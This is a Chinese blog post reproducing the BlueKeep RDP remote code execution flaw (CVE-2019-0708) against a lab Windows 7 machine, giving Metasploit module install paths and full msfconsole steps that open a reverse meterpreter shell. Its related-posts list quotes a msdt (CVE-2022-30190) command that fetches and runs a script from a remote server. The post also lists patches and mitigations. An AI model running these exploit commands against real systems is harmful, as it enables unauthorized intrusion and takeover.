cve-2019-0708远程桌面代码执行漏洞复现

最新推荐文章于 2024-05-11 11:29:51 发布
最新推荐文章于 2024-05-11 11:29:51 发布
阅读量890 收藏 3
点赞数
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25645753/article/details/109516067
版权

1.影响版本

Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP

2.漏洞描述

   Microsoft Windows中存在远程桌面执行代码漏洞,该漏洞源于Microsoft Remote Desktop Services中存在输入验证错误漏洞,网络系统或产品未对输入的数据进行正确的验证。当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

3.环境准备

镜像:Windows 7 (下载不到的直接私信我,我给你发)
攻击机器:Kali 192.168.157.130
受害机器:win7 sp1:192.168.157.143

4.漏洞复现

1)在Vmware中安装镜像,受害主机开启远程桌面连接服务
在这里插入图片描述
2)配置msf,将exp放置到msf对应文件夹下,如果同名直接覆盖(以Kali为例)

rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb ->/opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

3)加载攻击模块,配置参数

root@kali:~# msfconsole
msf5 > reload_all # 加载0708exp
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhost 192.168.157.143
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 192.168.157.130
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lport 1919
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

在这里插入图片描述
4)攻击成功,获取shell
在这里插入图片描述
使用show targets可查看相关选项,设置target我选2,虽然应该选择3,3是VMware,可是选择3会使得目标蓝屏,选2才能反弹shell
在这里插入图片描述

5.漏洞修复

1)及时去微软官网打对应系统的安全补丁;
2)关闭3389端口或添加防火墙安全策略限制对3389端口的访问;
3)打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击。
免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明

蜜罐小明哥
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
RDP远程桌面漏洞(CVE-2019-0708)
谢公子的博客
09-07 5793
9.7号凌晨一点多,开发者 @rapid7在Github上放出了windows远程桌面服务RCE漏洞(CVE-2019-0708)的exp。一大早醒来,朋友圈就被各大公司安全预警给刷了屏,趁着上午,立马把该exp了一波。 漏洞影响Windows版本: Windows XP SP3 x86 Windows XP Professional x64 Edition SP2 Windows...
CVE-2019-0708(BlueKeep)漏洞分析与
热门推荐
未完成的歌~的博客
03-14 1万+
文章目录一、 漏洞简介1、漏洞介绍:2、漏洞原理:3、影响版本:二、 漏洞环境:过程:1、主机发:2、使用MSF的漏洞模块:3、对靶机进行漏洞扫描:4、使用攻击模块,对靶机进行攻击5、使用POC,进行蓝屏攻击 一、 漏洞简介 1、漏洞介绍: 2019年5月14日微软官方发布安全补丁,修了 Windows 远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的 Windows 系统。此漏洞是预身份验证,无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用,与2017年 WannaCr
CVE-2019-0708 漏洞
最新发布
qq_40860153的博客
05-11 384
存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的 MS_T120,并为结构体内的函数指针赋恰当的值,即可实远程命令执行。4、可以看到攻击完成,但是没有成功创建会话,通过分析告警提示,是需要指定一下目标攻击框架,这里再设置一下攻击框架,再发起攻击就可以成功获取到会话了。攻击机:192.168.0.1。
CVE-2019-0708 Windows RDP远程代码执行 漏洞
WFC1006848997的博客
01-12 656
Windows RDP远程代码执行 CVE-2019-0708 漏洞 漏洞简介 Windows操作系统远程桌面服务远程代码执行漏洞CVE-2019-0708) , 2019年5月14日微软官方发布安全补丁,修了windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。 影响版本 Windows 7 Windows
CVE-2019-0708远程桌面服务远程代码执行漏洞
chwwww的博客
05-17 2284
漏洞信息: 2019年5月14日微软官方发布安全补丁,修了Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708(https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708),此漏洞是预身份验证且无需用户交互(无需验证系统账户密码),这就意味着这个漏洞可以通过网络蠕虫的方式被利用...
Windows远程桌面代码执行漏洞(CVE-2019-0708)
whh6tl的博客
07-25 4383
漏洞简介: 2019年5月14日微软官方发布安全补丁,修了windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。 威胁类型 远程代码执行 威胁等级 高 漏洞编号 CVE-2019-0708 受影响系统及应用版本 Windows 7 Windows server 2008 R2 Windows server 2008
远程桌面代码执行漏洞CVE-2019-0708)
春日野穹
06-24 1280
目录导航 一. 漏洞范围 二. 漏洞探测 三. 漏洞利用 四. 修建议 CVE-2019-0708 漏洞影响范围: Windows 7(已停止维护) Windows Server 2008 R2 Windows Server 2008 Windows Server 2003(已停止维护) Windows XP(已停止维护) 漏洞环境:ed2k://|file|cn_windows_7_enterprise_x64_dvd_x15-70741.iso|3203516416|876DCF115C
CVE-2019-0708:3389远程桌面代码执行扩展CVE-2019-0708批量检测工具(Rdpscan Bluekeep Check)
02-05
微软3389远程漏洞CVE-2019-0708批量检测工具 0x001 Win下检测 https://github.com/robertdavidgraham/rdpscan C:\Users\K8team\Desktop\rdpscan-master\vs10\Release 的目录 2019/06/02 02:11 <DIR> . 2019/06/02 02...
CVE-2019-0708远程桌面服务远程执行代码漏洞
Welcome To Myon'Blog !
12-22 1506
CVE-2019-0708 远程桌面服务远程执行代码漏洞
Windows CVE-2019-0708 远程桌面代码执行漏洞
WY92139010的博客
09-08 915
Windows CVE-2019-0708 远程桌面代码执行漏洞 一、漏洞说明 2019年5月15日微软发布安全补丁修了CVE编号为CVE-2019-0708的Windows远程桌面服务(RDP)远程代码执行漏洞,该漏洞在不需身份认证的情况下即可远程触发,危害与影响面极大。 目前,9月7日EXP代码已被公开发布至metasploit-framework的Pull reques...
CVE-2019-0708漏洞
qq_43774515的博客
07-14 474
一、实验目的 实CEV-2019-0708 RDP漏洞, 漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。 二、 实验内容 1. 实验环境 kali(192.168.91.129) Win7 (192.168.91.191) 开启3389端口,允许远程桌面连接;修改高级共享设置,默认是关闭的; 2. 进入msfconsole 3. 漏洞测试 输入search cve-2019-0708 可用测试模块: 0 auxiliary/scanner/rdp/cve_2019_0708_
0708远程桌面代码执行漏洞
independe的博客
09-14 295
Exp 攻击工具准备 1.使用如下命令一键安装metasploit-framework (msf) curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework- wrappers/msfupdate.erb > msfinstall...
漏洞CVE-2019-0708(BlueKeep)
weixin_45632448的博客
06-14 3655
2019年5月14日微软官方发布安全补丁,修了 Windows 远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的 Windows 系统。此漏洞是预身份验证,无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用,与2017年 WannaCry 勒索病毒的传播方式类似。存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数
远程桌面代码执行漏洞cve-2019-0708)
chaojixiaojingang
10-27 3904
1.影响版本 Windows 7 Windows Server 2008 R2 Windows Server 2008 Windows 2003 Windows XP 2.漏洞描述 Microsoft Windows中存在远程桌面执行代码漏洞,该漏洞源于Microsoft Remote Desktop Services中存在输入验证错误漏洞,网络系统或产品未对输入的数据进行正确的验证。当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称...
CVE-2019-0708远程代码执行漏洞过程
weixin_43862171的博客
09-26 532
漏洞环境: 攻击机:kali 受害机:Windows7 SP1 漏洞执行过程 1.需要先从github或者别的链接下载exp(文章底部附下载链接) 2.配置攻击机,kali自带msf,但是需要从外部导入0708执行模块。具体命令如下: rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/explo...
cve-2022-30190 msdt远程代码执行漏洞
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值